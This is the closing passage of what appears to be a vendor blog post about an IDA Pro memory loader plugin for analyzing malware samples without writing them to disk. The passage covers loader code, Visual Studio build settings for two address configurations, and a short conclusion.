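	// Copy the raw bytes into the database at an arbitrary base address.
	mem2base(buf.begin(), 0x10000, 0x10000 + size, 0);
	add_segm(0, 0x10000, 0x10000 + size, "MEM", "CODE");
}

// The loader definition block that IDA enumerates.
loader_t LDSC =
{
	IDP_INTERFACE_VERSION,
	0,            // loader flags
	accept_file,
	load_file,
	NULL,         // save_file
	NULL,         // move_segm
	NULL,         // process_archive
};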

  1. The project can be compiled into two versions: 64-bit IDA with 64-bit addresses, and 64-bit IDA with 32-bit addresses. From this point forward we will refer to them as:
    1. X64 | X64 – 64-bit IDA with 64-bit addresses
    2. X32 | X64 – 64-bit IDA with 32-bit addresses

 

  • Target file name (Configuration Properties -> Target Name)
    1. X64 | X64 – $(ProjectName)64
    2. X32 | X64 – $(ProjectName)
  • Include header files (same for X64 | X64 and X32 | X64):
    1. Configuration Properties -> C/C++ -> Additional Include Directories – should point to the location of your IDA Pro SDK.
    2. Set Runtime Library -> Multi-threaded Debug (/MTd)
  • Include lib files:
    1. X64 | X64
      1. idasdk75\lib\x64_win_vc_64
    2. X32 | X64
      1. idasdk75\lib\x64_win_vc_32
      2. idasdk75\lib\x64_win_vc_64
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Preprocessor Definitions):
    1. X64 | X64 add: __EA64__
    2. X32 | X64 add: __X64__, __NT__
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Undefined Preprocessor Definitions):
    1. X32 | X64: __EA64__
Conclusion

When downloading malware to analyze from repositories like VirusTotal, the sample is usually zipped so that endpoint security doesn’t detect it as malicious. Using our Memory Loader plugin will enable you to reverse engineer malicious binaries without writing them to disk.

Using the Memory Loader plugin also saves you time when analyzing binaries. When working with malicious content in IDA Pro, a separate environment is often created for it, usually in a virtual machine. Copying the binary over and setting up the machine for research every time you want to open IDA is time-expensive. The Memory Loader plugin allows you to work from your own machine in a safer and more productive way.

Please note that an IDA Pro license is needed to use and develop extensions for IDA Pro.

The SentinelOne IDA Pro Memory Loader Plugin is available on Github.

 

